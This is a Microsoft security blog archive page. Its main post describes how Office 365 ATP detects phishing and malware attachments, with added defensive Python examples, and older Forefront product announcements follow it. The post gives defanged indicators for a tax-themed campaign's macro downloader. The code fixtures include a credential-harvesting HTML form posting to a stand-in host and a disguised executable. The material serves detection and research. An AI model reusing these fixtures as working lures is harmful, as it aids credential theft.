Archive for the ‘antispam’ Category

Enhancing Office 365 Advanced Threat Protection with detonation-based heuristics and machine learning

Email, coupled with reliable social engineering techniques, continues to be one of the primary entry points for credential phishing, targeted attacks, and commodity malware like ransomware and, increasingly in the last few months, cryptocurrency miners.

Office 365 Advanced Threat Protection (ATP) uses a comprehensive and multi-layered solution to protect mailboxes, files, online storage, and applications against a wide range of threats. Machine learning technologies, powered by expert input from security researchers, automated systems, and threat intelligence, enable us to build and scale defenses that protect customers against threats in real-time.

Modern email attacks combine sophisticated social engineering techniques with malicious links or non-portable-executable (non-PE) attachments such as HTML or document files to distribute malware or steal user credentials. Attackers favor non-PE file formats because they are easy to modify, obfuscate, and make polymorphic, which lets them constantly tweak email campaigns to try to slip past security defenses. Every month, Office 365 ATP blocks more than 500,000 email messages that use malicious HTML and document files to open a website with malicious content.

Figure 1. Typical email attack chain

Detonation-based heuristics and machine learning

Attackers employ several techniques to evade file-based detection of attachments and blocking of malicious URLs, including multiple redirections, large dynamic and obfuscated scripts, HTML tag manipulation, and others.

Office 365 ATP protects customers from unknown email threats in real-time by using intelligent systems that inspect attachments and links for malicious content. These automated systems include a robust detonation platform, heuristics, and machine learning models.

Detonation in controlled environments exposes thousands of signals about a file, including behaviors like dropped and downloaded files, registry manipulation for persistence and for storing stolen information, outbound network connections, and so on. The volume of detonated threats translates to millions of signals that need to be inspected. To scale protection, we employ machine learning technologies to sort through this massive amount of information and determine a verdict for analyzed files.

Machine learning models examine detonation artifacts along with various signals from the following:

  • Static code analysis
  • File structure anomaly
  • Phish brand impersonation
  • Threat intelligence
  • Anomaly-based heuristic detections from security researchers

Figure 2. Classifying unknown threats using detonation, heuristics, and machine learning

Our machine learning models are trained to find malicious content using hundreds of thousands of samples. These models use raw signals as features with small modifications to allow for grouping signals even when they occur in slightly different contexts. To further enhance detection, some models are built using three-gram models that use raw signals sorted by timestamps recorded during detonation. The three-gram models tend to be more sparse than raw signals, but they can act as mini-signatures that can then be scored. These types of models fill in some of the gaps, resulting in better coverage, with little impact to false positives.
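To make the three-gram idea concrete, here is an added example (not Office 365 ATP code and not from the original post) that orders constructed detonation signals by timestamp, turns them into trigram mini-signatures, weights each trigram by smoothed log-odds over a tiny labeled set, and scores an unseen trace. The signal names, the traces and the threshold are assumptions made up for this illustration.

```python
from collections import Counter
from math import log

# Constructed detonation traces for the example: (timestamp_ms, signal) pairs as a
# sandbox might emit them. These are not real Office 365 ATP signals or samples.
MALICIOUS_TRACES = [
    [(5, "open_document"), (40, "macro_exec"), (120, "net_connect"),
     (300, "file_write:exe"), (310, "process_create"), (500, "reg_set:Run")],
    [(2, "open_document"), (55, "macro_exec"), (150, "net_connect"),
     (400, "file_write:exe"), (410, "process_create")],
    [(1, "open_html"), (30, "script_eval"), (90, "net_connect"),
     (200, "file_write:exe"), (210, "process_create"), (600, "reg_set:Run")],
]
BENIGN_TRACES = [
    [(3, "open_document"), (60, "font_load"), (90, "render_page"),
     (800, "file_write:tmp"), (900, "close")],
    [(1, "open_html"), (20, "script_eval"), (50, "render_page"),
     (70, "net_connect"), (400, "close")],
    [(4, "open_document"), (50, "render_page"), (300, "print_dialog"), (600, "close")],
]

# Unseen traces scored below; timestamps deliberately listed out of order to show
# that the model orders signals by recorded time, not by emission order.
UNSEEN_MALICIOUS = [(250, "file_write:exe"), (0, "open_document"), (100, "net_connect"),
                    (260, "process_create"), (30, "macro_exec")]
UNSEEN_BENIGN = [(0, "open_document"), (10, "render_page"), (20, "close")]


def ordered_signals(trace):
    """Sort raw signals by the timestamp recorded during detonation."""
    return [signal for _, signal in sorted(trace, key=lambda rec: rec[0])]


def trigrams(signals):
    """Consecutive three-signal windows; each one acts as a mini-signature."""
    return [tuple(signals[i:i + 3]) for i in range(len(signals) - 2)]


def train(malicious, benign):
    """Weight each trigram by the smoothed log-odds of occurring in a malicious
    versus a benign trace (presence per trace, not raw count)."""
    mal_docs, ben_docs = Counter(), Counter()
    for trace in malicious:
        mal_docs.update(set(trigrams(ordered_signals(trace))))
    for trace in benign:
        ben_docs.update(set(trigrams(ordered_signals(trace))))
    weights = {}
    for gram in set(mal_docs) | set(ben_docs):
        p_mal = (mal_docs[gram] + 1) / (len(malicious) + 2)   # Laplace smoothing
        p_ben = (ben_docs[gram] + 1) / (len(benign) + 2)
        weights[gram] = log(p_mal / p_ben)
    return weights


def score(trace, weights):
    """Sum the weights of the trigrams present; trigrams never seen contribute 0."""
    return sum(weights.get(gram, 0.0) for gram in set(trigrams(ordered_signals(trace))))


def verdict(trace, weights, threshold=1.0):
    """Assumed threshold; a real deployment would tune it against false positives."""
    return "malicious" if score(trace, weights) >= threshold else "benign"


def top_signatures(weights, n=3):
    """The highest-weighted trigrams: the learned mini-signatures."""
    return sorted(weights, key=weights.get, reverse=True)[:n]


if __name__ == "__main__":
    model = train(MALICIOUS_TRACES, BENIGN_TRACES)
    for gram in top_signatures(model):
        print(f"{model[gram]:+.2f}  {' -> '.join(gram)}")
    print(verdict(UNSEEN_MALICIOUS, model), verdict(UNSEEN_BENIGN, model))
```

Counting presence per trace rather than raw occurrences, and giving unseen trigrams a weight of zero, is what keeps the sparse trigram features from raising false positives: a trace is only pushed toward a malicious verdict by sequences that were actually characteristic of malicious detonations. A production model learns the weights rather than computing log-odds by hand, and hashes the trigrams so the feature space stays bounded.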

Machine learning can capture and expose even uncommon threat behavior by using several technologies and dynamic featurization. Features like image similarity matching, domain reputation, web content extraction, and others enable machine learning to effectively separate malicious or suspicious behavior from the benign.

Figure 3. Machine learning expands on traditional detection capabilities

Over time, as our systems automatically process and make a verdict on millions of threats, these machine learning models will continue to improve. In the following sections, we'll describe some interesting malware and phishing campaigns detected recently by Office 365 ATP machine learning models.

Phishing campaigns: Online banking credentials

One of the most common types of phishing attack uses HTML and document files to steal online banking credentials. Gaining access to online bank accounts is one of the easiest ways for attackers to profit from illicit activities.

The email messages typically mimic official correspondence from banks. Phishers have become very good at crafting these messages: they target global banks but also localize content for local banks.

The HTML or document attachments are designed to look like legitimate sign-in pages or forms. Online banking credentials and other sensitive information entered into these files or websites are sent to attackers. Office 365 ATP's machine learning models use this behavior, among other signals, to determine that such attachments are malicious and block the offending email messages.

Figure 4. Sample HTML files that mimic online banking sign in pages. (Click to enlarge)

Phishing campaigns: Cloud storage accounts

Another popular example of phishing campaigns uses HTML or document attachments to steal cloud storage or email account details. The email messages imply that the recipient has received a document hosted in a cloud storage service. In order to supposedly open the said document, the recipient has to enter the cloud storage or email user name and password.

This type of phishing is very rampant because gaining access to either email or cloud storage opens up many opportunities for attackers to access sensitive documents or compromise the victim's other accounts.

Figure 5. Sample HTML files that pose as cloud storage sign in pages. (Click to enlarge)
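Both the banking and the cloud-storage campaigns above share one structural shape: a local HTML attachment containing a password form that posts to a remote host, dressed up with brand text. As an added example (not code from the post or from Office 365 ATP) of the kind of static signal a classifier can draw on, the following parses an attachment with the standard library and flags that shape. The sample attachments, the brand list, the collection host (on the reserved .example TLD) and the point threshold are all constructed for this illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachments; not artifacts from a real campaign.
SAMPLE_PHISH_HTML = """<html><head><title>OneDrive - Sign in</title></head><body>
<img src="logo.png" alt="OneDrive">
<p>You have received a shared document. Sign in with your email account to view it.</p>
<form method="POST" action="https://secure-login-verify.example/collect.php">
  <input type="text" name="email" placeholder="Email">
  <input type="password" name="password" placeholder="Password">
  <input type="submit" value="View document">
</form>
</body></html>"""

SAMPLE_BENIGN_HTML = """<html><body><h1>Quarterly report</h1>
<p>The figures are in the attached spreadsheet.</p></body></html>"""

# Hypothetical brand list for the example; a production list would be far larger.
BRANDS = ("onedrive", "dropbox", "sharepoint", "office 365", "docusign", "online banking")


class FormInspector(HTMLParser):
    """Collect forms, password inputs, meta-refresh redirects and visible text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.meta_refresh = []
        self.text = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "password": False, "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["fields"].append(a.get("name", ""))
            if a.get("type", "").lower() == "password":
                self._form["password"] = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh.append(a.get("content", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

    def handle_data(self, data):
        self.text.append(data)


def analyze(html):
    """Score an HTML attachment; returns the reasons so an analyst can review them."""
    parser = FormInspector()
    parser.feed(html)
    parser.close()
    text = " ".join(parser.text).lower()
    reasons, points = [], 0
    for form in parser.forms:
        if not form["password"]:
            continue
        host = urlparse(form["action"]).hostname
        if host:
            # A local file whose password form posts to a remote host is the
            # defining shape of a credential-harvesting attachment.
            reasons.append(f"password form posts to {host}")
            points += 2
        else:
            reasons.append("password form in a local attachment")
            points += 1
    brands = [b for b in BRANDS if b in text]
    if brands:
        reasons.append("brand text: " + ", ".join(brands))
        points += 1
    if parser.meta_refresh:
        reasons.append("meta refresh redirect")
        points += 1
    # Assumed threshold: two independent indicators before calling it suspicious.
    return {"suspicious": points >= 2, "points": points, "reasons": reasons, "brands": brands}


if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH_HTML), ("benign", SAMPLE_BENIGN_HTML)):
        print(name, analyze(sample))
```

This is a structural heuristic, not a verdict engine: it sees through neither JavaScript that builds the form at runtime nor a form whose action is assigned by script, which is exactly why the post pairs static signals like these with detonation. The reasons list is what makes the result useful to a researcher reviewing a borderline sample.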

Tax-themed phishing and malware attacks

Tax-themed social engineering attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules. These campaigns use various messages related to tax filing to convince users to click a link or open an attachment. The social engineering messages may say the recipient is eligible for a tax refund, confirm that a tax payment has been completed, or declare that payments are overdue, among others.

For example, one campaign intercepted by Office 365 ATP machine learning implied that the recipient had not completed tax filing and was due for a penalty. The campaign targeted taxpayers in Colombia, where tax filing ended in October. The email message aimed to alarm taxpayers by suggesting that they had not filed their taxes.

Figure 6. Tax-themed email campaign targeting taxpayers in Colombia. The subject line translates to: You have been fined for not filing your income tax returns

The attachment is a .rar file containing an HTML file. The HTML file contains the logo of Dirección de Impuestos y Aduanas Nacionales (DIAN), the Colombian tax and customs organization, and a link to download a file.

Figure 7. Social engineering document with a malicious link

The link points to a shortened URL hxxps://bit[.]ly/2IuYkcv that redirects to hxxp://dianmuiscaingreso[.]com/css/sanci%C3%B3n%20declaracion%20de%20renta.doc, which downloads a malicious document.

Figure 8: Malicious URL information

The malicious document carries downloader macro code. When it is opened, Microsoft Word issues a security warning. The document contains instructions to click Enable Content, which executes the embedded malicious VBA code.

Figure 9: Malicious document with malicious macro code

If the victim falls for this social engineering attack, the macro code downloads and executes a file from hxxp://dianmuiscaingreso[.]com/css/w.jpg. Despite the .jpg name, the downloaded file is an executable: a file injector and password-stealing malware detected by Windows Defender AV as Trojan:Win32/Tiggre!rfn.
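Two links in this chain depend on a file name lying about its contents: a .rar wrapping an HTML file, and a PE served as w.jpg. The following is an added example (not from the post and not from any Microsoft product) of the check a mail gateway or proxy can apply: identify content by its header bytes instead of its name, and recurse into zip containers so a renamed executable inside an archive is still found. RAR parsing needs a third-party library, so the constructed archive here is a zip; the signature table, the extension mapping and the sample attachment are all constructed for this illustration.

```python
import io
import zipfile

# Well-known file header bytes (constructed table for the example; not exhaustive).
MAGIC = [
    (b"MZ", "pe"),
    (b"Rar!\x1a\x07", "rar"),
    (b"PK\x03\x04", "zip"),
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF8", "gif"),
]

# What the file name claims to be; docx/xlsx are zip containers, doc/xls are OLE.
EXT_TO_TYPE = {
    "exe": "pe", "dll": "pe", "scr": "pe", "jpg": "jpeg", "jpeg": "jpeg",
    "png": "png", "gif": "gif", "pdf": "pdf", "rar": "rar", "zip": "zip",
    "docx": "zip", "xlsx": "zip", "doc": "ole", "xls": "ole", "html": "html", "htm": "html",
}


def sniff(data):
    """Identify content from its first bytes, ignoring the file name entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    head = data[:512].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html")) or b"<script" in head:
        return "html"
    return "unknown"


def extension(name):
    """Lower-cased extension of the last path component, or '' if there is none."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def check(name, data):
    """Compare the type claimed by the extension with the sniffed type."""
    claimed = EXT_TO_TYPE.get(extension(name))
    actual = sniff(data)
    mismatch = claimed is not None and actual != "unknown" and actual != claimed
    return {"name": name, "claimed": claimed, "actual": actual,
            "mismatch": mismatch, "executable": actual == "pe"}


def scan(name, data, depth=0):
    """Check a file and, for zip containers, every member (nesting depth bounded)."""
    findings = [check(name, data)]
    if findings[0]["actual"] == "zip" and depth < 2:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                if not member.endswith("/"):
                    findings.extend(scan(f"{name}/{member}", zf.read(member), depth + 1))
    return findings


def build_sample_zip():
    """Constructed attachment: an HTML lure plus a PE header renamed to .jpg."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.html",
                    "<html><body><script>location='https://lure.example/'</script></body></html>")
        zf.writestr("photo.jpg", b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan("attachment.zip", build_sample_zip()):
        flag = "MISMATCH" if finding["mismatch"] else "ok"
        print(f"{flag:8} {finding['name']}: claims {finding['claimed']}, is {finding['actual']}")
```

The depth bound limits nested containers but not decompressed size, so a real gateway also caps the bytes it will inflate. A match of claimed and actual type is not a clean bill of health: the .doc in this campaign has a perfectly valid OLE header, and its danger is the macro inside, which is what detonation is for.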

Because Office 365 ATP machine learning detects the malicious attachment and blocks the email, the rest of the attack chain is stopped, protecting customers at the onset.

Artificial intelligence in Office 365 ATP

As threats rapidly evolve and become increasingly complex, we continuously invest in expanding the capabilities of Office 365 Advanced Threat Protection to secure mailboxes from attacks. Using artificial intelligence and machine learning, Office 365 ATP can constantly scale coverage for unknown and emerging threats in real time.

Office 365 ATP's machine learning models leverage Microsoft's wide network of threat intelligence, as well as seasoned threat experts who have a deep understanding of malware, cyberattacks, and attacker motivation, to combat a wide range of attacks.

This enhanced protection from Office 365 ATP contributes to and enriches the integrated Microsoft 365 threat protection, which provides an intelligent, integrated, and secure solution for the modern workplace. Microsoft 365 combines the benefits and security technologies of the Office 365, Windows, and Enterprise Mobility Suite (EMS) platforms.

Office 365 ATP also shares threat signals to the Microsoft Intelligent Security Graph, which uses advanced analytics to link threat intelligence and security signals across Office 365, the Windows Defender ATP stack of defenses, and other sensors. For example, when a malicious file is detected by Office 365 ATP, that threat can also be blocked on endpoints protected by Windows Defender ATP and vice versa. Connecting security data and systems allows Microsoft security technologies like Office 365 ATP to continuously improve threat protection, detection, and response.

Office 365 Threat Research

Please let us know about how you use email security solutions in your workplace

December 6th, 2010 Comments off

Hello everyone,

The Microsoft Forefront team is currently conducting a survey and would like to hear your opinions about email security, especially how you use email security solutions in your organization. We would appreciate it if you would take the time to respond to this survey. This information will help us improve Forefront Protection for Exchange.

Please consider taking a few minutes at this time to complete the survey. This survey should take about 10-15 minutes to complete.

To participate, please click here.

Carolyn Liu
Senior Program Manager, Forefront Server Protection

RELEASE ANNOUNCEMENT FOR HOTFIX ROLLUP 2 for FOREFRONT PROTECTION FOR EXCHANGE

November 29th, 2010 Comments off

On behalf of the Security team at Microsoft, I am pleased to announce the release of Hotfix Rollup 2 for Microsoft’s Forefront Protection 2010 for Exchange.

On November 30th Microsoft shipped Hotfix Rollup 2 for Forefront Protection 2010 for Exchange to provide a series of product enhancements and new features.

For a complete list of the new features and enhancements included in this rollup, along with directions for download, please see the following Knowledge Base article: http://support.microsoft.com/kb/2420647

As the installer runs, server service restarts may be necessary, so please plan accordingly when applying this Hotfix Rollup.

Regards,

Robert McCarthy
CSS Microsoft Security

Hotfix rollup 3 for Forefront Security for Exchange Server SP2 and hotfix rollup 3 for Forefront Security for SharePoint SP3 are now available

October 8th, 2010 Comments off

On behalf of the Forefront Server Protection team at Microsoft, I am pleased to announce the release of Forefront Security for Exchange Server (FSE) SP2 Rollup 3 and Forefront Security for SharePoint (FSSP) SP3 Rollup 3.

On October 8th, 2010 Microsoft shipped both builds to address a performance issue with version 8 of the Kaspersky antivirus engine.

For a detailed description of the updates please see the following Knowledge Base articles:

As the installer runs, server service restarts may be necessary, so please plan accordingly when applying this hotfix rollup.

Regards,

Robert McCarthy
Sr. Support Engineer
Microsoft Security

Information about the new antivirus engine for Forefront and Antigen products

September 29th, 2010 No comments

Microsoft is upgrading the multi-engine protection in all Forefront server security products to support a newer version of the antivirus engine. The newer version will provide customers with improved scanning times and reduced signature file size. The new engine replaces the older engine.

This new engine publishes update files in a subdirectory, the first engine in the Forefront engine mix to do so. In order to accommodate this new publishing model, Microsoft is releasing a series of roll-ups that will:

  • Include the new antivirus engine
  • Ensure that any engine that publishes update files in a subdirectory will update correctly

Customers must install the rollups by Jan. 31, 2011.

Krishnan Venkatasubramanian

Senior Program Manager, Forefront Server Protection

Forefront Server Protection RSS feeds are now available!

September 23rd, 2010 No comments

Hello,

I’d like to take a moment and encourage each of you to check out Microsoft’s latest efforts to save you support costs and time.

Introducing Forefront Server RSS feeds: Forefront Server RSS Feeds

By subscribing to our Forefront Server RSS feed, you allow Microsoft to give you the answers without having to ask the questions. Our goal is to provide insight into the top Forefront Server solutions as early as possible while saving you the time, resources, and effort of opening a support case. Our Solution Center list page (Solution Centers) provides an RSS icon in the upper right hand corner of your browser that points to the feed subscription page as well.

Empower yourself! Subscribe, ask questions, and provide feedback!

And remember, the bad guys never sleep and are busy developing new ways to wreak havoc on your network. Forefront developers work tirelessly to give you the latest means to defend against these attacks. Make sure you are incorporating these shields into your environment with the latest updates for Forefront Server products: Forefront Server Product Updates.

Rob McCarthy

Sr. Support Engineer
CSS Security
